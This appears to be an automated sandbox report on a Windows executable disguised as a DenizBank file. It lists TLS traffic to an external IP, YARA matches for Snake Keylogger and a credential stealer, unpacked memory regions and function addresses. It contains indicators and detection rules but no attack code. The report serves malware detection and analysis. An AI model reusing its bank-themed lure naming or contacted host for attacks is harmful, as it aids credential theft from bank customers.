Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50087 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50104 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50127 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50129 version: TLS 1.2

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_00E7D344	0_2_00E7D344
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_072361EE	0_2_072361EE
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723F8EA	0_2_0723F8EA
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723D8F0	0_2_0723D8F0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07239500	0_2_07239500
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07239510	0_2_07239510
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07230560	0_2_07230560
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07230559	0_2_07230559
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723B020	0_2_0723B020
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723B010	0_2_0723B010
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_072390B8	0_2_072390B8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_072390D8	0_2_072390D8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723ABE8	0_2_0723ABE8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07239938	0_2_07239938
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07239948	0_2_07239948
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723D8B8	0_2_0723D8B8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723D8E0	0_2_0723D8E0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AC146	5_2_011AC146
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A5362	5_2_011A5362
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AD278	5_2_011AD278
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AC468	5_2_011AC468
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AC738	5_2_011AC738
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AE988	5_2_011AE988
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A69A0	5_2_011A69A0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011ACA08	5_2_011ACA08
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A3AA1	5_2_011A3AA1
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A9DE0	5_2_011A9DE0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011ACCD8	5_2_011ACCD8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011ACFA9	5_2_011ACFA9
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A6FC8	5_2_011A6FC8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A3E09	5_2_011A3E09
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AE97B	5_2_011AE97B
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AF961	5_2_011AF961
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A39EE	5_2_011A39EE
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A29EC	5_2_011A29EC
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A11E80	5_2_06A11E80
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A117A0	5_2_06A117A0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A10B30	5_2_06A10B30
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A15028	5_2_06A15028
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1FC68	5_2_06A1FC68
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A19C70	5_2_06A19C70
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A12968	5_2_06A12968
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A19548	5_2_06A19548
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1E6AF	5_2_06A1E6AF
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1E6B0	5_2_06A1E6B0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1EAF8	5_2_06A1EAF8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1DE00	5_2_06A1DE00
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A11E70	5_2_06A11E70
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1E24A	5_2_06A1E24A
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1E258	5_2_06A1E258
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A18BA0	5_2_06A18BA0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1F3A8	5_2_06A1F3A8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1F3B8	5_2_06A1F3B8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1178F	5_2_06A1178F
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A18B91	5_2_06A18B91
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A19BFB	5_2_06A19BFB
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A10B20	5_2_06A10B20
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A19328	5_2_06A19328
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1EB08	5_2_06A1EB08
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1EF60	5_2_06A1EF60
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1EF51	5_2_06A1EF51
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1CCA0	5_2_06A1CCA0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1D0F8	5_2_06A1D0F8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1F802	5_2_06A1F802
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A10006	5_2_06A10006
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1F810	5_2_06A1F810
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A15018	5_2_06A15018
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A10040	5_2_06A10040
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1D9A8	5_2_06A1D9A8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1D999	5_2_06A1D999
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1DDFF	5_2_06A1DDFF
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1D540	5_2_06A1D540
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1D550	5_2_06A1D550
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1295A	5_2_06A1295A

Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1797971019.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799143667.000000000289D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799143667.0000000002801000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000000.1742572689.000000000049A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameyGuK.exe@ vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1801804713.0000000005270000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1803104884.0000000007630000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4223830752.0000000006FF9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe	Binary or memory string: OriginalFilenameyGuK.exe@ vs denizbank 25.11.2024 E80 aspc.exe

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, Zz---.cs	Cryptographic APIs: 'TransformFinalBlock'
